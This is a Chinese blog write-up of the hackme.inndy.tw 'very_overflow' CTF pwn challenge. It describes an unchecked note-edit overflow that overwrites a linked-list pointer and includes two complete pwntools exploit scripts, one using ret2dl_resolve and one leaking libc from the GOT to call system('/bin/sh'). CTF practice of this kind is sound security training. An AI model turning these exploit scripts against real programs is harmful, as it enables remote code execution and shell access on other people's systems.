hackme inndy pwn veryoverflow writeup

最新推荐文章于 2021-08-10 14:08:36 发布
最新推荐文章于 2021-08-10 14:08:36 发布
阅读量557 收藏 2
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/charlie_heng/article/details/78956180
版权

这次是最后一题了,做完这题一定要去复习!!!!(立了个flag。。。

这题有两种思路做,第一种是return2dl_resolve 第二种是泄漏libc,rop运行system(‘/bin/sh’)

因为想完美一点,所以一开始写的是第一种,写完了,在本地get到shell了,连到服务器,结果不行,一看,栈的地址开头是ff,这个也代表eof。。。不吐槽了,现在来分别说下两种思路是怎么做的

其实两种思路都是rop,而这里怎么rop呢?

因为这是个记事本程序,所以有new note,show note功能

每个note都是用一个单向链表连接,然而,在edit note的时候没有检查长度,所以能溢出修改下一个note的指针,这样就造成了任意内存写和任意内存读了

第一种思路
因为这题没有read,所以要泄漏FILE *stdin,但是FILE *stdin所在的内存没有两个连续有内容的内存连着,所以要先往FILE *stdin前面写点东西,然后再读

读完了之后,rop调用 fget(bss+0x900, 0x128, stdin) 然后在bss+0x900处放上dl_resolve_data
然后rop调用dl_resolve_call(bss+0x920,bss+0x900)

第二种思路
直接泄漏got表中的内容,然后求出基址,rop调用system(‘/bin/sh’)

第一种思路代码

from pwn import *
import roputils as rp

#p=process('./very_overflow')
p=remote('hackme.inndy.tw', 7705)
rop=rp.ROP('./very_overflow')
e=ELF('./very_overflow')
context.log_level='debug'
#gdb.attach(proc.pidof(p)[0])
bss=e.bss()+0x900
#raw_input()


def add_note(content):
    p.sendline('1')
    p.recvuntil('Input your note: ')
    p.sendline(content)
    p.recvuntil('Your action: ')

def edit_note(index,content):
    p.sendline('2')
    p.recvuntil('Which note to edit: ')
    p.sendline(str(index))
    p.recvuntil('Your new data: ')
    p.sendline(content)
    p.recvuntil('Your action: ')

def show_note(index,sw=0):
    p.sendline('3')
    p.recvuntil('Which note to show: ')
    p.sendline(str(index))
    p.recvuntil('Next note: ')
    addr=p.recvuntil('\n')[:-1]
    p.recvuntil('Note data: ')
    data=p.recvuntil('\n')[:-1]
    p.recvuntil('Your action: ')
    if sw==0:
        return addr
    else:
        return data

def exit_note():
    p.sendline('5')

add_note('1234')
stack=show_note(0)
print(stack)
stack=int(stack,16)
rop_addr=stack+0x4202
stdin=0x804A040-8

edit_note(0,'1'*6+p32(stdin))

edit_note(2,'a')

edit_note(0,'1'*6+p32(stdin+4))
data=show_note(2,1)[:4]
import struct

stdin_f=struct.unpack('<L',data)[0]
print(hex(stdin_f))


edit_note(0,'1'*6+p32(rop_addr))

payload=rop.call('fgets',bss,0x100,stdin_f)
payload+=rop.dl_resolve_call(bss+0x20,bss)

edit_note(2,payload)

bss_data='/bin/sh\x00'
bss_data += rop.fill(0x20,bss_data)
bss_data += rop.dl_resolve_data(bss+0x20,'system')

exit_note()
time.sleep(1)
p.sendline(bss_data)

p.interactive()

第二种思路代码

from pwn import *

debug=0
if debug:
    p=process('./very_overflow')
    context.log_level='debug'
    e=ELF('/lib/i386-linux-gnu/libc.so.6')
    #gdb.attach(proc.pidof(p)[0])
    #raw_input()
else:
    context.log_level='debug'
    p=remote('hackme.inndy.tw',7705)
    e=ELF('./libc.so')


def add_note(content):
    p.sendline('1')
    p.recvuntil('Input your note: ')
    p.sendline(content)
    p.recvuntil('Your action: ')

def edit_note(index,content):
    p.sendline('2')
    p.recvuntil('Which note to edit: ')
    p.sendline(str(index))
    p.recvuntil('Your new data: ')
    p.sendline(content)
    p.recvuntil('Your action: ')

def show_note(index,sw=0):
    p.sendline('3')
    p.recvuntil('Which note to show: ')
    p.sendline(str(index))
    p.recvuntil('Next note: ')
    addr=p.recvuntil('\n')[:-1]
    p.recvuntil('Note data: ')
    data=p.recvuntil('\n')[:-1]
    p.recvuntil('Your action: ')
    if sw==0:
        return addr
    else:
        return data

def exit_note():
    p.sendline('5')

add_note('1234')
stack=show_note(0)
print(stack)
stack=int(stack,16)
rop_addr=stack+0x4202

put_got=0x0804A014 

edit_note(0,'1'*6+p32(put_got-4))
data=show_note(2,1)[:4]
import struct

puts=struct.unpack('<L',data)[0]
base=puts-e.symbols['puts']

system=base+e.symbols['system']
binsh=base+e.search('/bin/sh').next()

edit_note(0,'1'*6+p32(rop_addr))

payload=p32(system)+p32(0xdeadbeef)+p32(binsh)

edit_note(2,payload)

exit_note()

p.interactive()
charlie_heng
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Hackme Writeup
wywwzjj
05-21 1万+
https://wywwzjj.top/2019/02/02/Hackme-Writeup/ hide and seek Can you see me? I’m so close to you but you can’t see me. 这题查看源码即可。 guestbook This guestbook sucks. sqlmap is your friend. 既然提示有 sqlmap...
hackme.inndy.tw的一些Writeup(5月30更新)
热门推荐
baikeng3674的博客
10-21 2万+
hackme.inndy.tw的一些Writeup(6月3日更新) 原文链接:http://www.cnblogs.com/WangAoBo/p/7706719.html 推荐一下https://hackme.inndy.tw/scoreboard/,上边有一些很好的针对新手的题目,但网上能搜到的Writeup很少,因此开了这篇博文记录一下部分目前解出的题目(主要是pwn和r...
hackme inndy petbook writeup
charlie_heng的专栏
02-16 455
这题一直没人做,感觉好像很难,其实是自己吓倒自己 这题的漏洞其实很明显,就是没有初始化对象,所以可以控制新new出来的user的pet的地址和post的地址 这里说下怎么控制 ·1. new一个比一个user大,即大于536字节的post 2. edit这个post,将这个post弄成更大的,这个时候realloc会把原来的堆给free掉,然后再new一个新的堆 3. 这个时候再new一...
hackme inndy pwn tictactoe writeup
charlie_heng的专栏
01-03 542
昨天立的果然是个flag。。。。还是忍不住做了 这题ai其实很容易破,有个任意内存写,直接写到胜利就可以了 但是怎么get shell呢? 看了下,发现初始化的时候把一段地址设为可写了,那段地址存的是DT_SYMTAB之类的地址,所以很明显,这题是ret2dlresolve,那么怎么改呢? 最快的方法是改DT_STRTAB,当执行到memset的时候,把它的字符串变为system,然后再将...
hackme inndy pwn raas writeup
charlie_heng的专栏
12-31 373
继续做题,之前一直对堆不是很熟,这次特地做一道堆的题来练手 首先题目给了提示,是一道UAF 可以看到,有3个操作,一个是新建,一个是删除,一个是展示 删除和展示如上,新建的代码太长,我就简述下功能吧 1.选择类型,数字还是字符串 2.如果是字符串,要输入长度 3.输入内容 内存的操作是,先new了一个大小为12的堆,前8位放的是用于展示的函数指针和用于删除的函数指针 如...
NUAACTF pwn string writeup
qq_39596232的博客
08-24 1596
题目描述: 菜鸡遇到了Dragon,有一位巫师可以帮助他逃离危险,但似乎需要一些要求 题目分析: 1、首先查看下文件的信息及其保护机制: tucker@ubuntu:~/pwn$ file string string: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter...
攻防世界 pwn babyheap writeup
liucc09的博客
01-19 513
分析 这题题目中显示是Wellcome To the 2.27 Heap World,而且只能申请7个chunk,理论上应该是一道libc2.27 tcache的题,但因为在交互过程中触发了fastbin的double free错误,所以攻防世界上应该是把这题部署在了libc2.23的环境中,但无所谓,下面libc2.27和libc2.23的解法都会给出。 libc2.27解法 首先我们要泄漏libc的地址,tcache肯定是无法泄漏libc的,因此我们考虑使用unsorted bin来泄漏,这题有off
0x00 cg_pwn2【XCTF攻防世界pwn系列writeup】
weixin_36711901的博客
11-20 449
目录一、基本情况分析:二、构造payload:三、EXP:合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 一、基本情况分析: 首先对可执行文件进行基本检查: 如图所示,该文件为32位i386的ELF可执行文件,只开启了NX,RELRO(部分
[BUGKU][CTF][PWN][2020] PWN writeup
dadongwudi的博客
01-12 596
PWN1 关键字:nc 知识点:nc使用方法 https://www.cnblogs.com/nmap/p/6148306.html nc命令是一个功能打包的网络实用程序,它通过命令行在网络上读取和写入数据;nc是为NMAP项目编写的,是目前已分裂的netcat家族的顶峰,它被设计成一个可靠的后端工具,可以立即为其他用户提供网络连接应用程序和用户。nc不仅可以使用IPv4和IPv6,而且可以为用户提供无限的潜在用途。 在nc的大量功能中,有能力将nc链接在一起;TCP、UDP和到其他站点的SCTP端口;支持
hackme的web部分水题writeup集合
cggwz的信息飞船
10-31 441
简单介绍,hackme是提供ctf基础题的一个很好的网站,网站链接如下: 网站链接 这次把web部分的头几个没什么值得说的题说一下,因为太短了,单独发一篇博客不值得。 hide and seek 几乎每个平台都有这道题,直接右击查看源代码即可看到flag。目的就是教会我们查看网页源代码。应平台要求,flag就不提供了。 scoreboard 网页源代码里是没有的,也没有很多的提示,那么只能说flag在服务器端或者在数据包里,起码不在客户端。scoreboard页面可以和服务器端沟通的只有登录按钮和提交fla
hackme.inndy.tw的rop2题目
10-15
这是https://hackme.inndy.tw/scoreboard/的rop2题目如果网站被墙或者关闭请从这里下载
hackme inndy pwn leave_msg writeup
charlie_heng的专栏
01-01 409
感觉有点做题做上瘾了。。。。。 拿到程序,首先checksec看下开了什么保护,发现没开nx,但是开了栈溢出检测,然后又有堆,明显是把shellcode放堆里面去执行 然后看了下,下标检查那里可以加个空格绕过,可以修改got表里面的函数为堆的值,调用函数的时候就会执行堆里面的shellcode 但是这里有一个长度判断,大于8就会截断,放不了一般的shellcode 这里绕过就比较骚了,首先...
hackme inndy reverse rc87cipher writeup
charlie_heng的专栏
02-01 587
话说这题真的挺难折腾出来的 首先这个程序是有upx壳的 但是这个壳被魔改了,关键的信息都被删除了,在google搜了半天linux upx upack 都找不到什么有用的信息 有两条路,一条是修复关键信息,一条路是像windows那些程序那样手动脱壳脱下来 两条路其实都试了一下,不过最终行得通的是第二条路 这里说下第一条路,如果你们有兴趣的话,可以去试试 首先作者把0xB4~0xB7处...
hackme.inndy.tw very_overflow 经验总结
qq_43189757的博客
09-04 203
解题过程: 看反汇编代码 看出该程序 是个笔记程序 有添加,编辑,显示单个笔记,显示全部笔记 四个选择 一开始我是想找溢出点,盯着add_note 想到创建很多个note 可以导致溢出 随后过程中有两种想法,但是都不行 1.使用ret2dl_resolve 的方法,但是发现单靠add_note 只能控制栈上一处空间的内容 使用add_note 在内存中的存储形式是 node->next(4字...
hackme inndy pwn echo2 writeup
charlie_heng的专栏
12-30 863
这题做了好久。。。但是学到了很多很骚的思路 做完echo1 ,然后看了下echo2,本来以为只是简单的从32位变成64位,但是发现坑贼多。。。。 首先,用checksec看了下,发现开了pie。。。那就不能简单的改got表,还要用格式化字符串漏洞来泄漏出一个指向程序本身的指针 第二,因为是64位系统,所以一个地址是8个字节,但是这里实际只有6个字节是有内容的,有两个字节是00,所以就不能用p...
very_overflow的wp
一个码农的笔记
12-05 452
https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了very_overflow这个题目感觉还不错,我把wp分享出来,方便大家学习 very_overflow的题目要求是: nc hackme.inndy.tw 7705Source Code: https://hackme.inndy.tw/static/very_overflow.c程序的源码给了,这个程
pwn int_overflow
weixin_45677731的博客
03-15 188
32位程序,拖进ida看一下 首先,我们要输入1进入login() 输入username后再输入passwd,注意这里passwd允许我们输入的长度为0x199 再点进check_passwd 这里用v3来保存我们输入的passwd的长度,但是,这个v3是unsigned int8型的,8个字节,只能存储不超过256的数,如果超过会重新从1开始计算,这样的话,对于1个字符和257个字符,v3...
[攻防世界 pwn]——int_overflow
Y_peak的博客
02-19 206
[攻防世界 pwn]——int_overflow 题目地址: https://adworld.xctf.org.cn/ 题目: checksec一下,开启了NX 在IDA中看看, 发现了后面函数和可以gets函数, 不过可惜这个gets函数无法栈溢出。不过我们看到在check_passwd函数中有strcpy函数, dest是可以栈溢出的, 不过前题是我们可以绕过检查。 看了下 , 判断的v3是储存在al这个8位寄存器中, 也就是一个字节。当然也可以从_int8看出来是一个字节 0~255。所
攻防世界-pwn新手区-int_overflow
CHAWUCIREN1的博客
08-10 271
看题目就知道是整形溢出 运行一下 检查一下保护机制 丢入32位ida里面 发现一个函数 可以通过覆盖跳转到这个函数就可以拿到flag system_addr = 0x804868B check_passwd处有一个判定,输入的数字要在3和8之间否则就直接退出 在这里需要说明一下,这个unsigned int就是无符号的整型,我们要知道,在计算机中,所有的数据指令都是以二进制的形式存在的,010101这样,那么正负数怎么存在呢,这里就有一个符号位,一般是在一段数据的第一个位置 比如260的十六进制
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值